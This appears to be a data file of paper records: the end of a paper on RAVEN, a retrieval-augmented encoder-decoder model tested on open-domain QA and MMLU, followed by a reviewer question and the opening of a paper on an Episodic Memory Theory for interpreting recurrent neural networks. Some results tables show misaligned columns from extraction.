11B S1 | 26.7 | 21.3 | 29.8 | **31.3** | 56.9 | 35.5 | 62.3 | **63.9** | | ATLAS 11B S2 | 21.4 | 16.3 | 9.8 | | 49.8 | 48.4 | 44.4 | | Dec: \(a_1 \ldots <extra_id_{(k-1)}> a_k\) An example with this strategy is shown in Figure 1 (right). The model is expected to learn from in-context examples by examining both the input to the encoder and input to the decoder. ### 3.2 EXPERIMENTAL SETUP We select two widely-used datasets in the domain of open-domain question answering: Natural Questions (NQ) (Kwiatkowski et al., 2019) and TriviaQA (TQA) (Joshi et al., 2017). To assess the performance, we follow the previous work (Izacard et al., 2022b) to employ the standard exact match (EM) metric. For the few-shot settings, we follow Brown et al. (2020) to evaluate each example in the test set by generating in-context examples through randomly sampling \(k\) instances from the respective task’s training set. Following Izacard et al. (2022b), we use an index composed of December 2018 Wikipedia dump for NQ and an index composed of December 2021 Wikipedia corpora for TriviaQA. We use the checkpoints released in the official repository,\(^4\) covering sizes of 11B (XXL), 3B (XL), and 770M (Large). We conduct experiments with various configurations detailed in the next section. ### 3.3 RESULTS & ANALYSIS #### 3.3.1 EFFECT OF PROMPTING STRATEGIES We first study the effectiveness of the prompting strategies described in §3.1. Table 1 summarizes the results. We find that ATLAS struggles to learn from in-context examples using strategy 2, as the few-shot performance is worse than the zero-shot performance. We hypothesize that this is because the model has difficulty learning the pattern of S2 with masked language modeling during its pretraining, since it is unlikely to obtain several consecutive question-answer pairs (or something similar) in the form of strategy 2 by randomly masking several spans in a sequence. On the other hand, we observe that with strategy 1, the model does exhibit some in-context learning ability, where the 5-shot and 8-shot performance is significantly better than the zero-shot performance on both NQ and TriviaQA. Therefore, we choose to focus on strategy 1 for further study and disregard strategy 2 for the remainder of the paper.\(^5\) #### 3.3.2 EFFECT OF NUMBER OF IN-CONTEXT EXAMPLES The number of in-context examples is a crucial hyperparameter for in-context learning. Generally, we expect better performance from a model with more in-context examples, but there is an upper limit due to 1) the maximum context length setup, e.g., 512 tokens, during the pretraining process, and 2) the point at which the model has received sufficient examples and cannot gain additional information from more examples. The optimal number of in-context examples also varies between models. For instance, on TriviaQA, PaLM (Chowdhery et al., 2022) exhibits better 1-shot performance than settings with more examples, while this is not the case for GPT-3 (Brown et al., 2020). Figure 2 illustrates the impact of varying the number of in-context examples across different ATLAS model sizes. Interestingly, the 11B model demonstrates poor performance in low-shot settings, e.g., 1-shot, but improves significantly after 4-shot and 5-shot. Upon examining the generated responses, we find that the model tends to produce answers with more tokens in low-shot settings, while the ground truth typically consists of shorter answers with fewer than 5 tokens. By relaxing the criteria for a correct prediction to include instances where the ground-truth answer is a substring of the model output, we find that the 1-shot performance surpasses that of the 0-shot setting (38.3 vs 32.1 on NQ). --- \(^4\)https://github.com/facebookresearch/atlas \(^5\)We also study the effect of target question’s position in Appendix C.1 Figure 2: Results of ATLAS with different numbers of in-context examples. Figure 3: Results of ATLAS 11B with different numbers of retrieved passages. All models perform well in the 5-shot and 8-shot settings, but their performance does not continue to improve with more in-context examples (e.g., 16-shot). We believe this plateau may be attributed to two factors: 1) the sequence length constraints during ATLAS pretraining, where the maximum input length to the encoder is set to 384 tokens, and the average input sequence length (excluding passages) is around 130 tokens; 2) the model’s ability to learn adequately with 5 or 8 examples, making additional examples less beneficial. 3.3.3 Effect of number of retrieved passages Figure 3 illustrates the impact of the number of retrieved passages on model performance. We observe that for both 0-shot and 5-shot settings, the performance of the models increases significantly with the number of retrieved passages. This highlights the effectiveness of the Fusion-in-Decoder architecture [Izacard & Grave, 2021] for knowledge-intensive tasks like open-domain question answering, and underscores the importance of pretraining language models with retrieval augmentation. Additionally, the 5-shot performance consistently outperforms the 0-shot setting. This observation further emphasizes the value of providing in-context examples to improve the performance of retrieval-augmented encoder-decoder language models. 3.3.4 Summary In summary, ATLAS exhibits a certain ability for in-context learning, which has been overlooked in previous studies. However, there are also some limitations such as unstable performance in low-shot settings, and the fact that providing more in-context examples does not consistently improve performance. Moreover, retrieving more relevant passages significantly enhances performance, demonstrating the significance of pretraining language models with retrieval for knowledge-intensive tasks. This also highlights the superiority of the encoder-decoder (Fusion-in-Decoder) architecture, which offers an advantage not available to decoder-only language models. 4 METHODOLOGY In this section, we design methods to improve the models’ zero-shot performance and in-context learning abilities based on the findings and analysis presented in §3. 4.1 RAVEN: COMBINING RETRIEVAL-AUGMENTED MASKED AND PREFIX LANGUAGE MODELING As described in §3, ATLAS is pretrained with a masked language modeling objective, where the input is a corrupted text with several masked spans placed randomly within the sequence (refer to Figure 1 (left) for an example). However, in testing, based on our analysis in §3.3.1 and §C.1, it is most effective to place the target question after all the in-context examples, with a masked token (i.e., `<extra_id_0>`) following the question (Figure 1 middle). Thus, there exists a mismatch between pretraining and testing of ATLAS. To better align pretraining with testing, we propose to continually pretrain ATLAS with prefix language modeling (Liu et al., 2018; Raffel et al., 2020; Tay et al., 2023). Specifically, for each sequence, we mask 10% of the tokens on average at the end of the sequence with the `<extra_id_0>` token. Then, we use the retriever of ATLAS to retrieve relevant passages using the prefix and train the model to recover the suffix of this sequence with the prefix and the passages as input. An example of input and output for prefix language modeling is shown in Figure 4. We can observe that the pretraining objective aligns more closely with the prompting strategy 1 in Figure 1. We refer to the model trained with additional prefix language modeling as RAVEN. Starting from the ATLAS checkpoint, which is based on masked language modeling, the training of RAVEN can be considered a combination of retrieval-augmented masked and prefix language modeling. This methodology shares certain aspects with the mixture objective of UL2 (Tay et al., 2023). However, there are key differences: 1) UL2 blends various language modeling objectives throughout its training process, while RAVEN applies these two objectives in a sequential order; 2) Unlike RAVEN, UL2 is trained without retrieval. Consequently, RAVEN benefits from both the masked language modeling, which contributes to a better reader and retriever as evidenced in Izacard et al. (2022), and prefix language modeling, which mitigates the gap between pretraining and testing. We verify the effectiveness of this design by exploring different training strategies in Appendix C.3. 4.2 FUSION-IN-CONTEXT LEARNING In §3.3.2, we observe that ATLAS’s performance does not further improve with more in-context examples after 8-shot. One major reason for this is the limited sequence length during the pretraining process, which makes it difficult for the model to handle long sequences during testing. Pretraining models with longer contexts would be a straightforward approach to address this issue, but it would significantly increase computation cost and GPU memory requirements. Additionally, the maximum input length is also constrained by the maximum sequence length of the retriever, i.e., Contriever, which is based on BERT (Devlin et al., 2019) and has a maximum length of 512 tokens. As an alternative, we propose an approach to enable models to learn from more in-context examples without modifying the model configuration or requiring additional training. As described in §3, the reader of ATLAS (and RAVEN) is based on the Fusion-in-Decoder architecture (Izacard & Grave, 2021), where multiple passages are retrieved, and each passage, concatenated with the in-context examples and target question, is fed to the encoder separately (Figure 5 top). To allow the model to process more in-context examples without increasing the length of the input to the encoder, we can feed different in-context examples to the encoder with each passage (Figure 5 bottom). In this way, Table 2: Results of ATLAS and RAVEN on NQ and TriviaQA. | | Natural Questions | FiCL | TriviaQA | FiCL | |-------|-------------------|------|----------|------| | | 0-shot | 1-shot | few-shot | 0-shot | 1-shot | few-shot | | ATLAS | 3B | 23.7 | 25.1 | 28.4 (5) | 29.6 [64-3] | 54.3 | 55.5 | 61.1 (5) | 62.0 [64-5] | | ATLAS | 11B | 26.7 | 21.3 | 31.3 (8) | 32.0 [64-8] | 56.9 | 35.5 | 63.9 (8) | 64.9 [64-8] | | RAVEN | 3B | 29.3 | 31.7 | 31.4 (5) | 32.8 [40-1] | 62.4 | 63.2 | 62.6 (5) | 63.6 [40-1] | | RAVEN | 11B | 29.6 | 31.4 | 32.7 (5) | 33.5 [64-5] | 65.7 | 66.2 | 66.7 (5) | 67.3 [64-5] | the model can incorporate more in-context examples during its inference process. We refer to this strategy as Fusion-in-Context Learning (FiCL). In implementation, for a $k$-shot setting, such as a 64-shot setting, to effectively utilize the 64 examples, we randomly shuffle these examples and select $m$ (e.g., 5) examples in order as the input for the encoder each time. If all the examples have been used, we shuffle the 64 examples again. We denote the configuration of FiCL as $[k, m]$, which stands for $[k$-shot, $m$-fusion]. ### 4.3 In-Context Example Retrieval In recent studies (Liu et al., 2022; Rubin et al., 2022; Su et al., 2023), it has been demonstrated that a well-chosen selection of in-context examples can enhance in-context learning. Building on this insight, we propose utilizing the retriever of RAVEN to retrieve in-context examples. Specifically, we use RAVEN’s retriever to build an index during the preparation step, and then, during testing, when the model receives an input, it could efficiently retrieve in-context examples with its retriever. By integrating RAVEN’s retriever in this manner, we aim to: 1) automate in-context learning, which is particularly practical for model owners who have a database of examples. Without this, users would need to manually provide in-context examples; and 2) optimize the selection of in-context examples, thereby enhancing in-context learning and improving overall performance. ## 5 Experiments ### 5.1 Experimental Setup **Datasets.** Following §3.2, we first evaluate on two widely-used open-domain question answering datasets: Natural Questions (Kwiatkowski et al., 2019) and TriviaQA (Joshi et al., 2017). Additionally, we conduct a case study on long-form question answering using the ELI5 dataset (Fan et al., 2019). Furthermore, we assess the models’ language understanding ability using the Massively Multitask Language Understanding (MMLU) benchmark (Hendrycks et al., 2021). Detailed information regarding the MMLU evaluation is in Appendix B.4. Other evaluation settings are the same as §3.2. **Baselines.** Since RAVEN is built upon ATLAS, we choose ATLAS as a primary baseline for comparison. We also compare our model with decoder-only large language models such as GPT-3 (Brown et al., 2020) and PaLM (Chowdhery et al., 2022) (in a closed-book setting). Additionally, for open-domain QA, we evaluate our approach against REPLUG (Shi et al., 2023) and RETRO (Borgeaud et al., 2022), as well as its improved version RETRO++ (Wang et al., 2023). These models are decoder-only language models augmented with retrieval. REPLUG is based on Codex (Chen et al., 2021) and Contriever (Izacard et al., 2022a), where the passages are retrieved by Contriever (using ensemble and additional adaptation) and fed directly to Codex. RETRO is a GPT model (Radford et al., 2019) augmented with a transformer encoder to encode the retrieved passages. RETRO++ is a variant of RETRO that feeds the most relevant retrieved passage into the GPT decoder while providing other passages to its encoder. For MMLU, we also include FLAN-T5 (Chung et al., 2022), an enhanced version of T5 that has been trained on a large mixture of tasks with instruction finetuning.\(^6\) ### 5.2 Open-Domain Question Answering We choose open-domain QA as our primary evaluation task, as it effectively represents knowledge-intensive challenges and is widely employed in real-world applications. \(^6\)Implementation details are described in Appendix B.1 Figure 6: RAVEN vs ATLAS. Table 3: Results on NQ and TriviaQA in comparison to the baselines. | | Natural Questions | TriviaQA | |------------------|-------------------|----------| | | 0-shot | 1-shot | few-shot | 0-shot | 1-shot | few-shot | | GPT-3 | 13B | 7.8 | 13.7 | 21.0 (64) | 41.8 | 51.3 | 57.5 (64) | | GPT-3 | 175B | 14.6 | 23.0 | 29.9 (64) | 64.3 | 68.0 | 71.2 (64) | | PaLM | 8B | 8.4 | 10.6 | 14.6 (5) | 39.5 | 48.5 | 47.2 (5) | | PaLM | 62B | 18.1 | 23.1 | 27.6 (5) | 67.3 | 72.7 | 70.1 (5) | | PaLM | 540B | 21.2 | 29.3 | 39.6 (64) | 76.9 | 81.4 | 81.4 (1)* | | Codex | 175B | - | - | 40.6 (16) | - | - | 73.6 (16) | | LLaMA | 7B | 16.8 | 18.7 | 26.1 (64) | 50.0 | 53.4 | 57.6 (64) | | Codex + Contriever | 175B | - | - | 44.2 (16) | - | - | 76.0 (16) | | Codex + RePlug | 175B | - | - | 44.7 (16) | - | - | 76.8 (16) | | Codex + RePlug LSR | 175B | - | - | 45.5 (16) | - | - | 77.3 (16) | | Retro | 9.5B | 8.9 | - | - | 36.0 | - | - | | Retro++ | 9.5B | 25.8 | - | - | 48.3 | - | - | | RAVEN | 3B | 29.3 | 31.7 | 31.4 (5) | 62.4 | 63.2 | 62.6 (5) | | RAVEN + FiCL | 3B | 32.8 | 32.8 (40-1) | 63.6 (40-1) | | RAVEN | 11B | 29.6 | 31.4 | 32.7 (5) | 65.7 | 66.2 | 66.7 (5) | | RAVEN + FiCL | 11B | 33.5 | 33.5 (64-5) | 67.3 (64-5) | * For TriviaQA, PaLM’s 1-shot performance surpasses other settings. We follow the original paper to report the 1-shot result. For other models, we select the best k-shot \(k \in \{2, 3, 4, 5, 8, 16\}\) performance or report the number in the original paper. RAVEN vs ATLAS. Table 2 and Figure 6 present the exact match (EM) scores for ATLAS and RAVEN on the NQ and TriviaQA datasets. As shown in Table 2, both the 3B and 11B RAVEN models significantly outperform ATLAS. For instance, on TriviaQA, RAVEN 11B achieves an improvement of 8.8%, 30.7%, and 2.8% in the 0-shot, 1-shot, and few-shot settings respectively, compared to ATLAS 11B. Furthermore, as illustrated in Figure 6, the performance of RAVEN increases steadily with the number of in-context examples, while the performance of ATLAS experiences a substantial decline in low-shot settings. These results demonstrate the effectiveness of RAVEN across various shot settings. Fusion-in-Context Learning. We also report the results of models with Fusion-in-Context Learning (FiCL) in Table 2. For both ATLAS and RAVEN, FiCL contributes to approximately a 1% improvement, which is not attainable by standard in-context learning, where performance does not further improve (or even decreases) with more than 8 in-context examples. This demonstrates the superiority of FiCL for enabling models to learn from more examples. Comparison to SOTA. In Table 3, we compare RAVEN to other baselines. On NQ, RAVEN’s zero-shot and one-shot performance surpasses all the baselines, including PaLM, even though RAVEN 3B has 180 times fewer parameters than PaLM 540B. The zero-shot performance of RAVEN on TriviaQA is also on par with PaLM 62B. Furthermore, RAVEN’s zero-shot performance significantly exceeds that of both Retro and Retro++, which are models of a similar scale. In the few-shot setting, with FiCL, RAVEN achieves performance comparable to GPT-3 175B and PaLM 62B. However, there remains a gap between RAVEN and the larger PaLM 540B and Codex 175B models. Nevertheless, given the considerably smaller scale of RAVEN in comparison to PaLM... and Codex, its performance can be considered impressive. The performance of RAVEN may be further improved if it is built upon a larger model, in which case its few-shot performance is likely to surpass that of PaLM and Codex. **In-Context Example Retrieval.** §4.3 suggests using RAVEN’s retriever for in-context example retrieval. Results in Table 4 show that this approach improves RAVEN’s few-shot results, especially on NQ where a ~10% improvement is observed. This indicates the significant positive impact of incorporating more relevant in-context examples. **Additional Results.** We examine the effect of the number of retrieved documents in Appendix C.2, conduct an ablation study of different training strategies in Appendix C.3, and provide a case study on long-form question answering in Appendix C.4. ### 5.3 MMLU Table 5 summarizes the results (accuracy) on Massive Multitask Language Understanding (MMLU). We find that the zero-shot performance of RAVEN is impressive, surpassing the few-shot performance of GPT-3 175B and being slightly worse than PaLM 62B, despite having a significantly smaller number of parameters. Furthermore, with the same number of parameters, the performance of RAVEN is far superior to T5. Additionally, even without instruction finetuning, RAVEN achieves performance comparable to FLAN-T5, a model finetuned on a large collection of tasks. We expect further improvement of RAVEN by applying instruction tuning as well and leave it for future study. Interestingly, with standard in-context learning, the few-shot performance of RAVEN is worse than zero-shot, possibly due to the longer questions and answer options in MMLU causing context length issues in the 5-shot setting. Also, in the one-shot setting, since MMLU is a multiple-choice QA task, providing only one example might introduce bias in the model’s prediction, favoring a specific option. However, with Fusion-in-Context Learning, the performance improves significantly, leading to better few-shot performance for the 11B model compared to its zero-shot performance, further demonstrating the effectiveness of FiCL. ### 6 CONCLUSION In this study, we have delved into the in-context learning ability of retrieval-augmented encoder-decoder language models. We commenced with a comprehensive analysis of the state-of-the-art ATLAS model and subsequently developed our model based on the analysis. Our extensive experimental results demonstrated that our model significantly outperforms ATLAS and achieves results on par with some of the most advanced language models, even with substantially fewer parameters. These findings highlight the potential of retrieval-augmented encoder-decoder language models in the realm of in-context learning. Although we started with ATLAS, the insights and proposed methods are transferrable and can potentially enhance other models, such as domain-specialized or more powerful ones. The training strategy of RAVEN and the idea of FiCL are simple yet effective, and would not have been conceived without our analytical groundwork. Future work focusing on scaling up the model, applying these methods, and further studying its in-context learning ability is encouraged. | | NQ 1-shot | NQ 5-shot | TQA 1-shot | TQA 5-shot | |--------|-----------|-----------|------------|------------| | 3B | +9.1 | +11.6 | +0.0 | +1.6 | | 11B | +9.8 | +11.1 | -0.5 | +1.0 | | | 0-shot | 1-shot | 5-shot | |--------|--------|--------|--------| | GPT-3 | 13B | - | 26.0 | | GPT-3 | 175B | - | 43.9 | | PaLM | 8B | - | 25.3 | | PaLM | 62B | - | 53.7 | | PaLM | 540B | - | 69.3 | | T5 | 3B | - | 25.7 | | T5 | 11B | - | 25.9 | | FLAN-T5| 3B | - | 52.4 | | FLAN-T5| 11B | - | 55.1 | | ATLAS | 3B | 43.7 | 36.9 | 38.5 | | + FiCL | 3B | 42.6 | [40-1] | | ATLAS | 11B | 47.4 | 45.3 | 44.2 | | + FiCL | 11B | 48.0 | [40-1] | | RAVEN | 3B | 45.7 | 40.0 | 40.4 | | + FiCL | 3B | 44.5 | [64-5] | | RAVEN | 11B | 48.9 | 49.2 | 48.7 | | + FiCL | 11B | 50.5 | [40-1] | REPRODUCIBILITY STATEMENT We have detailed the hyperparameter setup and configurations in Appendix B.1. The checkpoints for the ATLAS and T5 models used in our experiments are publicly available at https://github.com/facebookresearch/atlas and https://huggingface.co/google/t5-xl-lm-adapter respectively. The exact input prompts for both pretraining and testing are included in Appendix B. The full code and model checkpoints will be made publicly available after the review process. REFERENCES Sebastian Borgeaud, Arthur Mensch, Jordan Hoffmann, Trevor Cai, Eliza Rutherford, Katie Millican, George Bm Van Den Driessche, Jean-Baptiste Lespiau, Bogdan Damoc, Aidan Clark, Diego De Las Casas, Aurelia Guy, Jacob Menick, Roman Ring, Tom Hennigan, Saffron Huang, Loren Maggiore, Chris Jones, Albin Cassirer, Andy Brock, Michela Paganini, Geoffrey Irving, Oriol Vinyals, Simon Osindero, Karen Simonyan, Jack Rae, Erich Elsen, and Laurent Sifre. Improving language models by retrieving from trillions of tokens. In Kamalika Chaudhuri, Stefanie Jegelka, Le Song, Csaba Szepesvari, Gang Niu, and Sivan Sabato (eds.), Proceedings of the 39th International Conference on Machine Learning, volume 162 of Proceedings of Machine Learning Research, pp. 2206–2240. PMLR, 17–23 Jul 2022. URL https://proceedings.mlr.press/v162/borgeaud22a.html Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, Sandhini Agarwal, Ariel Herbert-Voss, Gretchen Krueger, Tom Henighan, Rewon Child, Aditya Ramesh, Daniel Ziegler, Jeffrey Wu, Clemens Winter, Chris Hesse, Mark Chen, Eric Sigler, Mateusz Litwin, Scott Gray, Benjamin Chess, Jack Clark, Christopher Berner, Sam McCandlish, Alec Radford, Ilya Sutskever, and Dario Amodei. Language models are few-shot learners. In H. Larochelle, M. Ranzato, R. Hadsell, M.F. Balcan, and H. Lin (eds.), Advances in Neural Information Processing Systems, volume 33, pp. 1877–1901. Curran Associates, Inc., 2020. URL https://proceedings.neurips.cc/paper_files/paper/2020/file/1457c0d6bfc84967418bfb8ac142f64a-Paper.pdf Sébastien Bubeck, Varun Chandrasekaran, Ronen Eldan, Johannes Gehrke, Eric Horvitz, Ece Kamar, Peter Lee, Yin Tat Lee, Yuanzhi Li, Scott Lundberg, et al. Sparks of artificial general intelligence: Early experiments with gpt-4. arXiv preprint arXiv:2303.12712, 2023. Danqi Chen, Adam Fisch, Jason Weston, and Antoine Bordes. Reading Wikipedia to answer open-domain questions. In Proceedings of the 55th Annual Meeting of the Association for Computational Linguistics (Volume 1: Long Papers), pp. 1870–1879, Vancouver, Canada, July 2017. Association for Computational Linguistics. doi: 10.18653/v1/P17-1171. URL https://aclanthology.org/P17-1171 Mark Chen, Jerry Tworek, Heewoo Jun, Qiming Yuan, Henrique Ponde de Oliveira Pinto, Jared Kaplan, Harri Edwards, Yuri Burda, Nicholas Joseph, Greg Brockman, et al. Evaluating large language models trained on code. arXiv preprint arXiv:2107.03374, 2021. URL https://arxiv.org/abs/2107.03374 Aakanksha Chowdhery, Sharan Narang, Jacob Devlin, Maarten Bosma, Gaurav Mishra, Adam Roberts, Paul Barham, Hyung Won Chung, Charles Sutton, Sebastian Gehrmann, et al. Palm: Scaling language modeling with pathways. arXiv preprint arXiv:2204.02311, 2022. URL https://arxiv.org/abs/2204.02311 Hyung Won Chung, Le Hou, Shayne Longpre, Barret Zoph, Yi Tay, William Fedus, Eric Li, Xuezhi Wang, Mostafa Dehghani, Siddhartha Brahma, et al. Scaling instruction-finetuned language models. arXiv preprint arXiv:2210.11416, 2022. URL https://arxiv.org/abs/2210.11416 Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. BERT: Pre-training of deep bidirectional transformers for language understanding. In Proceedings of the 2019 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Volume 1 (Long and Short Papers), pp. 4171–4186, Minneapolis, Minnesota, June
HEcbGXzIHK
* Could you please discuss in detail the difficulties of applying the proposed theory to nonlinear RNNs? In Appendix A.4, you have shown that a nonlinear RNN has a similar form of the linear system as linear RNNs instead of a different $W_{hh}$.
Episodic Memory Theory for the Mechanistic Interpretation of Recurrent Neural Networks Anonymous authors Paper under double-blind review Abstract Understanding the intricate operations of Recurrent Neural Networks (RNNs) mechanistically is pivotal for advancing their capabilities and applications. In this pursuit, we propose the Episodic Memory Theory (EMT), illustrating that RNNs can be conceptualized as discrete-time analogs of the recently proposed General Sequential Episodic Memory Model. To substantiate EMT, we introduce a novel set of algorithmic tasks tailored to probe the variable binding behavior in RNNs. Utilizing the EMT, we formulate a mathematically rigorous circuit that facilitates variable binding in these tasks. Our empirical investigations reveal that trained RNNs consistently converge to the variable binding circuit, indicating universality in the learned dynamics of RNNs. Building on these findings, we devise an algorithm to define a privileged basis, which reveals latent neurons instrumental in the temporal storage and composition of variables — a mechanism vital for the successful generalization in these tasks. We show that the privileged basis enhances the interpretability of the learned parameters and hidden states of RNNs. Our work represents a step toward demystifying the internal mechanisms of RNNs and, for computational neuroscience, serves to bridge the gap between artificial neural networks and neural memory models. 1 Introduction AI-driven systems have become ubiquitous in real-world applications (Christian, 2021; Sears, 2021; Bostrom, 2014; Müller & Bostrom, 2013). While these systems demonstrate remarkable proficiency, their inherently black-box nature often renders them inscrutable (Alishahi et al., 2019; Buhmester et al., 2019; Fong & Vedaldi, 2017). Mechanistic interpretability aims to reverse engineer the intricate workings of neural networks that drive their behavior (Olah, 2022). Gaining a mechanistic understanding builds trust in AI systems and provides insights that can lead to refinement and innovation (Raukur et al., 2022). In essence, mechanistic interpretability is not just about demystifying AI; it’s about harnessing its potential responsibly and efficiently. Recurrent Neural Networks (RNNs) (Hochreiter & Schmidhuber, 1997) play a pivotal role in AI due to their unique ability to process sequential data (Graves et al., 2013), making them indispensable for tasks involving time series analysis, natural language processing, and other applications where understanding temporal dynamics is crucial (Che et al., 2018). One major challenge in understanding RNNs mechanistically is that the task-relevant information is stored in a hidden state that evolves over time. This temporal nature of RNNs raises critical questions: How is information reliably stored and processed in this evolving hidden state? and How are the learned parameters of RNNs connected to the computations performed? Addressing these questions is vital for advancing our understanding and application of RNNs in AI-driven systems. Answering these questions in RNNs require elucidating the mechanisms of ‘variable binding’ that enables them to dynamically associate information with variables and manipulate the information symbolically over time (Marcus, 2001). In cognitive systems, variable binding enables generalization in complex, structured tasks that involve symbolic relationships and dependencies between various elements (Greff et al., 2020). For instance, in natural language processing, variable binding promotes understanding and maintaining context over a sentence or a conversation. The importance of uncovering the variable binding mechanisms stems from its potential to bridge the gap between... simple pattern recognition and advanced cognitive capabilities, and move towards a better understanding and reasoning of AI systems. This will not only enhance the capabilities of AI systems but also provides deeper insights into the nature of intelligence itself - both artificial and biological. **Organization:** To formulate variable binding mechanisms in RNNs, we turn to computational neuroscience, drawing parallels between autonomously evolving RNNs and episodic memory retrieval models. First, we show the connection between RNN architectures and a recently proposed episodic memory model - General Sequential Episodic Memory Model in Section 3. We show that while GSEMM was introduced in continuous time, its temporal discretization corresponds with the evolution of RNNs. Episodic memory has varied definitions in different fields. Our definition of episodic memory is in line with the General Sequential Episodic Memory Model (Karuvally et al., 2022) and neuroscience (Umbach et al., 2020), which describes the ability of neural networks to store and process temporal and contiguous memory sequences. This contrasts with the psychological perspective of episodic memory as the subjective recollection of personal experiences (Tulving, 1972) where the focus is on the human recollecting the memory rather than the underlying system. In Section 4, we develop a class of algorithmic tasks designed to investigate the variable binding mechanisms of RNNs. These tasks involve a two-phase process: in the input phase, an RNN is presented with a series of $d$-dimensional vectors over $s$ timesteps, and in the output phase, it autonomously generates outputs based on this stored information, using a linear binary symbolic composition function. The tasks, while simpler than complex real-world scenarios, builds upon and extends previous task setups that explore RNN memory capabilities (Graves et al., 2014). Section 5 introduces the concept of *variable memories*—linear subspaces within the RNN that facilitate the variable binding and recursive composition of information. This concept allows us to fully deconstruct the mechanisms of variable binding in RNNs and propose a circuit mechanism answering how RNNs store and process information over time. Our experimental findings demonstrate a consistent convergence to the proposed circuit, contributing evidence to the ‘universality hypothesis’ in mechanistic interpretability (Olah et al., 2020; Li et al., 2015a). Further, the circuit mechanisms we found show notable similarities to recently developed brain-inspired traveling waves in RNNs (Keller et al., 2023), indicating a broader applicability of the theory beyond the toy variable binding tasks. In Section 6, we leverage the empirical convergence result to propose an algorithm to construct a privileged basis of the *variable memories*. In our results, we show that this basis fully deconstructs the learned behavior by uncovering *latent neurons* (by basis change of the RNN hidden state) and *latent synaptic interactions* (by basis change of the learned interactions) involved in information processing. ## 2 RELATED WORKS Our exploration of RNNs spans three, often separate, research direction - Dynamical Systems interpretation of RNNs, Mechanistic Interpretability, and Neural Memory Models. **Dynamical Systems Interpretation of RNNs:** Current approaches to interpret RNNs consider them as non-linear dynamical systems and apply linearization around fixed or slow-changing points to reveal their behavior (Marschall & Savin, 2023; Sussillo & Barak, 2013). The preliminary step in this analysis involves linearization around fixed points and slow-changing points found using optimization algorithms. The phase space flow is assembled piecemeal from each linearized region. The exploration of the long-term behavior of these regions is undertaken through the eigen-spectrum analysis of the corresponding linearized dynamical systems (Strogatz, 1994), providing insights into the dynamics of convergence, divergence, stability, or spiraling (Rowley et al., 2009; Kim, 1996). However, this method becomes intractable in our variable binding tasks when there are many dimensions exhibiting non-convergent behaviors. The proposed EMT generalizes this approach to the class of variable binding tasks and enables interpretation even when the number of non-converging dimensions is arbitrarily large (Appendix Figure 5). **Mechanistic Interpretability:** Mechanistic interpretability seeks to reverse-engineer neural networks to expose the underlying mechanisms enabling them to learn and adapt to previously unencountered conditions. The prevailing strategy involves examining the networks’ internal “circuits” (Conmy et al., 2023; Wang et al., 2022; Cammarata et al., 2020). Researchers have found that apply- Figure 1: Equivalence between Episodic Memory Models and Variable Binding. A. Episodic Memory models aim to uncover the cognitive processes involved in the retrieval of subjective past experiences often stored as a temporal sequence of memory items. The illustration shows the retrieval of a personal experience when an apple is observed. B. The illustration shows the application of the Episodic Memory Theory, which poses that learning the addition operation over arbitrary numbers to generate fibonacci numbers, a task involving variable binding, can be considered equivalent to episodic memory retrieval where the computations are performed over variables instead of predetermined memories. The abstract addition operation is stored in the synapses in the form of how the variables interact with each other to produce the desired result (See Appendix A.3 for details). Interpretability methods to large networks, such as transformers (Vaswani et al., 2017) handling complex tasks in natural language processing and vision, faces the challenge of unclear features to be modeled in internal circuits. To address this challenge, toy models are created with clearly defined features essential for task resolution. Probing models trained on toy tasks has resulted in supporting evidence for prevalent hypotheses. Some of the notable hypotheses are universality (Chughtai et al., 2023; Li et al., 2015b) - models learn similar features and circuits across different conditions when trained on similar tasks, bottleneck superposition (Elhage et al., 2022) - a mechanism for storing more information than the available dimensions, and composable linear representations (Cheung et al., 2019) - the use of linear spaces in feature representation. Despite these advancements, current approaches remain confined to forward only models like MLPs and transformers. Our proposed EMT generalizes the circuit approach of mechanistic interpretability to recurrent architectures and provides a mathematically grounded framework for deconstructing their behavior. Neural Memory Models: Developments in memory modeling have revealed links between deep neural networks and memory models. The first investigation of this link explored how the different activation functions in Multi-Layer Perceptrons affected the learned representations and memory capacity (Krotov & Hopfield, 2016). Later studies extended this connection to explain the practical computational benefits observed in neural architectures like transformers (Ramsauer et al., 2020). Recently, the traditional memory models capable of associative recall of static memories were expanded to retrieving memory sequences (Karuvally et al., 2022; Chaudhry et al., 2023). This expansion allows memories that previously did not interact in the static memory retrieval context to interact and produce complex temporal behavior (Kleinfeld, 1986; Kleinfeld & Sompolinsky, 1988). A fundamental assumption in memory modeling (in both static and sequence retrieval) is that the network’s memories are predetermined and stored in the synapses. This assumption limits the models’ applicability to understanding symbolic binding of memories typically available only during inference. In EMT, we will demonstrate that by lifting the fixed memory assumption in memory modeling, these memory models can be utilized to build principled circuits to show how RNNs bind external information. Summary: EMT reveals the synergistic relationship between the three fields - dynamical systems interpretation of RNNs, mechanistic interpretability, and neural memory modeling and suggests a unified approach to address the challenges of understanding neural behavior. 3 RNN as Episodic Memory We show that RNNs can be viewed as a discrete-time analog of a memory model called General Sequential Episodic Memory Model (GSEMM) (Karuvally et al., 2022), and as a result, enable human-interpretability in terms of learned memories and their interaction. See Appendix A.2 for detailed proof. The sketch of the proof is detailed below. To be applicable for the more gen- Figure 2: Circuit of variable binding in an illustrative task of four variables, each with five dimensions: A. The hidden state at time $t$ has subspaces capable of storing external information in their activities. The colors depict the vector components (or activity) of the hidden state in the variable memory basis. The linear operator $\Phi$ acts on the hidden state such that these activities are copied between variable memories except for $\Psi_4$, which implements the linear operation $f$. B. The $N^{th}$ variable contents are read during the output phase using the appropriate linear operator $W_r = \Psi_N$. eral setting of RNNs, we slightly modify the GSEMM synapse formulation to a pseudoinverse learning rule instead of the previous Hebbian rule. This modification allows the model to handle the more general case of linearly independent memory vectors, instead of orthogonal vectors only (Chaudhry et al., 2023; Personnaz et al., 1986). GSEMM is still a continuous time memory, so we discretize it using the forward Euler approximation under the conditions that the timescale parameters of GSEMM are $T_f = 1$, $T_h = 0$, and $T_d = 0$. The final discrete system we obtain is $$V_f(t+1) = \Xi(I + \Phi^\top)\Xi^\dagger \sigma_f(V_f(t)),$$ where $V_f$ is a vector representing the state of the neural network, $\Xi$ and $\Phi$ are matrices representing the stored memories and inter-memory interactions respectively. The columns of the $\Xi$ matrix are the static stored memories, and the matrix $(I + \Phi^\top) = \Phi^\top$ directs the chronology of these memories to form the sequences. The discrete system we derived is topologically conjugate 